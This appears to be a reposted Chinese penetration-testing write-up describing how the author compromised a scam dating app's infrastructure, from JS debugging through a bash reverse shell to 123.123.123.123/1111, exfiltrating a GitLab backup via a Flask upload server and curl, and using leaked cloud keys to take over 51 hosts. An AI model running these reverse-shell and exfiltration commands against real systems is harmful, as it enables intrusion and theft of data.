0x01 信息收集
首先给到一个资产是二维码,是一张sese图片里面带有约炮的app下载,扫码后得到如下结果
注册成功后发现全是妹子(........),这个时候先别急,咱第一步先去看他调用的JS资源,随便点击一个资源然后刷新一下看他F12网络
这里首先我只能用当时留下的毫无关联的图片进行演示了,当时我看到的JS文件叫 "MyProfile"
0x02 JS断点调试
这个凭借个人感觉就是个关键信息(我的资料 - > 配置信息?),
所以凭借这些理由,我在XHR中锁定了"MyProfile"这个关键字进行JS断点
然后刷新进行调试,在漫长的调试过程中我发现在一个很奇怪的JS文件中调用了我的MyProfile字段,叫 /assets/index-xxxxxx.js
一般来说我就会去审计一下这个JS文件,结果发现好东西了
bindgen: "git+http://123.123.123.123:1111/target2/a.git#0.0.14"
0x03 新突破
echo 'bash -i >& /dev/tcp/123.123.123.123/1111 0>&1' > /tmp/haha.shchmod +x /tmp/haha.sh/bin/bash /tmp/haha.sh
所以接下来就是去寻找Git权限能做的操作,找了一个下午,最终找到了backups目录里下找到了一个backup的tar包,应该八成就是gitlab上的备份了。
Flask之取文件
我的服务器
from flask import Flask,requestimport osapp = Flask(__name__)def upload_file():file = request.files.get('file')if file :filename = file.filenamefile.save(os.path.join(os.getcwd(),filename))return f"File {filename} saved successfully"else:return "worry"if __name__ == '__main__':app.run(host='0.0.0.0',debug=True,port=5000)
curl -X POST http://123.123.123.123:1111/upload -F file=@./a.gitlab_backup.tar0x04 云沦陷(泄露AK SK)
几个G,下载漫长的很呢!然后拖到本地后应该就是gitlab的备份了,(因为他备份文件名字中带有gitlab的版本号)要用到对应的gitlab的相应版本去搭建。
这个时候行云管家一把梭哈,因为权限很大,接管整个云了,总共是51台主机都拿下了。
0x05 总结
思路就是 :打点 -> JS文件断点调试 ->新突破上shell-> 解决困难-> 发现新大陆(本地搭建)-> 接管云,最后全部打包好给了JF,也进行取证立A了,到此因为一个JS文件拿下整个云结束了,思路可以学习一波。
文章来源:先知社区(1201463046740633)原文地址:https://xz.aliyun.com/t/12698
如侵权请私聊我们删文
如果您觉得该文章有用,请记得点赞和转发哟。
您的阅读和转发希望都可以让身边的朋友能够共同成长
谢谢大家关注黑客街安全团队
觉得不错点个“赞”、“在看”,支持下小编
原文始发于微信公众号(黑客街安全团队):记一次HC中因为JS拿下整个云!
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论